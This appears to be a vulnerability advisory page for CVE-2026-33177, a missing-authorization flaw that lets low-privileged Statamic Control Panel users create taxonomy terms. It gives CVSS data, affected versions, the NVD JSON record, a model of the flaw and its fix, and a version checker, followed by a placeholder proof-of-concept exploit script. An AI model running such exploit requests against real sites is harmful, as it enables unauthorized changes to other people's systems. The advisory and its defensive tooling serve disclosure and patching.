Security Vulnerability Report
CVE-2026-33177 CVSS 4.3 MEDIUM

CVE-2026-33177

Published: 2026-03-20 22:16:29
Last Modified: 2026-03-23 18:45:27

Description

Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.14 and 6.7.0, low-privileged Control Panel users could create taxonomy terms by submitting requests to the field action processing endpoint with attacker-controlled field definitions. This bypasses the authorization checks enforced on the standard taxonomy term creation endpoint. This has been fixed in 5.73.14 and 6.7.0.
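The bug class behind this advisory is CWE-862 (Missing Authorization): the policy check lives on the standard term-creation route, while a second route, field action processing, accepts request-supplied field definitions and reaches the same write without it. The following Python is an added example written for this page to show that pattern and its fix; it is a hypothetical sketch, not Statamic's code, and every name in it (TermStore, VulnerableCP, HardenedCP, can_create_term, the permission strings, the request shape) is an assumption.

```python
"""
Model of the CWE-862 pattern in this advisory: one route checks authorization,
another route (field action processing) runs attacker-supplied field
definitions that reach the same write without that check.
Hypothetical sketch added for this page; not Statamic's code. All names
and the request shape are assumptions.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, List


class Forbidden(Exception):
    pass


@dataclass
class User:
    name: str
    permissions: set


@dataclass
class TermStore:
    terms: Dict[str, List[str]] = field(default_factory=lambda: {"categories": []})

    def create(self, taxonomy: str, slug: str) -> None:
        self.terms.setdefault(taxonomy, []).append(slug)


def can_create_term(user: User, taxonomy: str) -> bool:
    return f"create {taxonomy} terms" in user.permissions or "super" in user.permissions


class VulnerableCP:
    """Authorization only on the standard route; field actions write unchecked."""

    def __init__(self, store: TermStore):
        self.store = store
        # Field "actions" keyed by the fieldtype named in the request body.
        # A terms field creates taxonomy terms on the fly, so it writes.
        self.field_actions: Dict[str, Callable] = {
            "terms": lambda user, cfg, value: self.store.create(cfg["taxonomy"], value),
        }

    def create_term(self, user: User, taxonomy: str, slug: str) -> None:
        if not can_create_term(user, taxonomy):   # the only check in this class
            raise Forbidden
        self.store.create(taxonomy, slug)

    def process_field_action(self, user: User, request: dict) -> None:
        # The field config comes straight from the request: the caller picks
        # the fieldtype and the taxonomy it points at. Nothing is authorized.
        handler = self.field_actions[request["field"]["type"]]
        handler(user, request["field"], request["value"])


class HardenedCP(VulnerableCP):
    """Both routes funnel through one operation that carries the check."""

    def __init__(self, store: TermStore):
        super().__init__(store)
        self.field_actions["terms"] = (
            lambda user, cfg, value: self.authorized_create(user, cfg["taxonomy"], value)
        )

    def authorized_create(self, user: User, taxonomy: str, slug: str) -> None:
        if not can_create_term(user, taxonomy):
            raise Forbidden
        self.store.create(taxonomy, slug)

    def create_term(self, user: User, taxonomy: str, slug: str) -> None:
        self.authorized_create(user, taxonomy, slug)


def attempt(cp: VulnerableCP, user: User) -> Dict[str, str]:
    """Try both routes as the given user; report 'created' or 'forbidden' per route."""
    out = {}
    for route, call in (
        ("standard", lambda: cp.create_term(user, "categories", "via-standard")),
        ("field-action", lambda: cp.process_field_action(user, {
            # Attacker-controlled field definition, constructed for this demo.
            "field": {"type": "terms", "taxonomy": "categories"},
            "value": "via-field-action",
        })),
    ):
        try:
            call()
            out[route] = "created"
        except Forbidden:
            out[route] = "forbidden"
    return out


LOW_PRIV = User("editor", {"view categories terms"})   # can log in, cannot create terms

if __name__ == "__main__":
    print("vulnerable:", attempt(VulnerableCP(TermStore()), LOW_PRIV))
    print("hardened:  ", attempt(HardenedCP(TermStore()), LOW_PRIV))
```

The fix worth taking away is structural rather than a one-line patch: the check belongs on the operation that performs the write, so that any route which reaches it, including one that interprets caller-supplied definitions, is covered automatically.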

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Weakness: CWE-862 (Missing Authorization)

Reading the vector: reachable over the network with low attack complexity, requires an authenticated low-privileged Control Panel account, no user interaction, scope unchanged. The impact is limited to integrity (unauthorized creation of taxonomy terms); confidentiality and availability are not affected.

Configurations (Affected Products)

cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* (all versions before 5.73.14) - VULNERABLE
cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* (versions from 6.0.0 up to but excluding 6.7.0) - VULNERABLE
Statamic CMS < 5.73.14
Statamic CMS >= 6.0.0, < 6.7.0
Fixed in: 5.73.14 (5.x branch) and 6.7.0 (6.x branch)
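A quick way to check an installation against the two affected ranges above is to read the locked version of statamic/cms from composer.lock and compare it with the CPE bounds from this record. The script below is an added example for this page, not NVD or Statamic tooling; the composer.lock fragments embedded in it are constructed for illustration.

```python
"""
Check a Statamic installation's composer.lock against the affected ranges
in this record for CVE-2026-33177: < 5.73.14, and >= 6.0.0 < 6.7.0.
Added example for this page; not NVD or Statamic tooling.
"""
import json
import re
from typing import Optional, Tuple

PACKAGE = "statamic/cms"

# Affected ranges as (start_inclusive, end_exclusive), copied from the two
# cpeMatch entries in this record. None means no lower bound.
AFFECTED_RANGES = [
    (None, (5, 73, 14)),
    ((6, 0, 0), (6, 7, 0)),
]


def parse_version(text: str) -> Optional[Tuple[int, ...]]:
    """Turn 'v5.73.13' or '6.6.2' into a comparable tuple. Returns None for
    non-numeric constraints such as dev-main, which need manual review."""
    m = re.match(r"^v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        return None
    return tuple(int(p) for p in m.groups())


def is_affected(version: Tuple[int, ...]) -> bool:
    """True if the version falls inside any affected range."""
    for start, end in AFFECTED_RANGES:
        if (start is None or version >= start) and version < end:
            return True
    return False


def installed_version(lock_json: str) -> Optional[str]:
    """Return the locked version string of statamic/cms, or None if absent."""
    lock = json.loads(lock_json)
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name") == PACKAGE:
                return pkg.get("version")
    return None


def assess(lock_json: str) -> str:
    """One of 'not-installed', 'unparseable:<v>', 'vulnerable:<v>', 'fixed:<v>'."""
    ver = installed_version(lock_json)
    if ver is None:
        return "not-installed"
    parsed = parse_version(ver)
    if parsed is None:
        return f"unparseable:{ver}"
    return f"{'vulnerable' if is_affected(parsed) else 'fixed'}:{ver}"


# Constructed composer.lock fragments for demonstration (not real files).
LOCK_VULNERABLE_5 = json.dumps({"packages": [{"name": PACKAGE, "version": "v5.73.13"}]})
LOCK_VULNERABLE_6 = json.dumps({"packages": [{"name": PACKAGE, "version": "6.6.2"}]})
LOCK_FIXED = json.dumps({"packages": [{"name": PACKAGE, "version": "v6.7.0"}]})

if __name__ == "__main__":
    for label, lock in (("5.x", LOCK_VULNERABLE_5), ("6.x", LOCK_VULNERABLE_6), ("fixed", LOCK_FIXED)):
        print(label, assess(lock))
```

On a real deployment, feed it the contents of the project's composer.lock (the locked version, not the constraint in composer.json, is what runs). Note that 5.73.14 and later 5.x releases are outside both ranges, so a 5.x install does not need to jump to 6.x to be fixed.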

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The advisory referenced below does not publish the field action route or its request format; the URL and payload in this script are placeholders and must be matched to the target version before the request means anything.

```python
import requests

# Target URL example (adjust based on actual installation). This path is a
# placeholder, not the field action route documented by the vendor.
target_url = "https://example.com/cp/collections/taxonomies/terms"

# Attacker's session cookie (low-privilege Control Panel user)
session_cookie = "statamic_session=low_priv_user_session_token"

# Headers. Laravel session-backed POST routes normally also require a CSRF
# token (X-CSRF-TOKEN or X-XSRF-TOKEN), which this script does not supply.
headers = {
    "Content-Type": "application/json",
    "Cookie": session_cookie,
    "X-Requested-With": "XMLHttpRequest",
}

# Payload aimed at the field action processing endpoint. The field definitions
# are attacker-controlled, which is what lets the request reach term creation
# without the authorization check on the standard endpoint. The exact shape is
# a placeholder.
payload = {
    "action": "create",
    "fields": {
        "title": "Malicious Term",
        "slug": "malicious-term",
    },
    "taxonomy": "categories",
}

try:
    response = requests.post(target_url, json=payload, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit successful! Taxonomy term created.")
        print("[+] Response:", response.text)
    else:
        print("[-] Exploit failed. Status code:", response.status_code)
except requests.RequestException as e:
    print(f"[-] An error occurred: {e}")
```

A 200 response alone does not prove the term was created; confirm by listing the taxonomy's terms in the Control Panel or on disk afterwards.

References

https://github.com/statamic/cms/security/advisories/GHSA-wh3h-gvc4-cc2g (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33177",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T22:16:29.117",
    "lastModified": "2026-03-23T18:45:27.150",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.14 and 6.7.0, low-privileged Control Panel users could create taxonomy terms by submitting requests to the field action processing endpoint with attacker-controlled field definitions. This bypasses the authorization checks enforced on the standard taxonomy term creation endpoint. This has been fixed in 5.73.14 and 6.7.0."
      },
      {
        "lang": "es",
        "value": "Statamic es un sistema de gestión de contenido (CMS) impulsado por Laravel y Git. Antes de las versiones 5.73.14 y 6.7.0, los usuarios del Panel de Control con bajos privilegios podían crear términos de taxonomía enviando solicitudes al endpoint de procesamiento de acciones de campo con definiciones de campo controladas por el atacante. Esto elude las comprobaciones de autorización aplicadas en el endpoint estándar de creación de términos de taxonomía. Esto ha sido corregido en 5.73.14 y 6.7.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-862"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "5.73.14",
                "matchCriteriaId": "23CF5975-D5BE-4138-AE2F-95F7BBE00F20"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "6.0.0",
                "versionEndExcluding": "6.7.0",
                "matchCriteriaId": "6B99B257-0FC1-4CF9-B006-8AEC17235BC8"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/statamic/cms/security/advisories/GHSA-wh3h-gvc4-cc2g",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```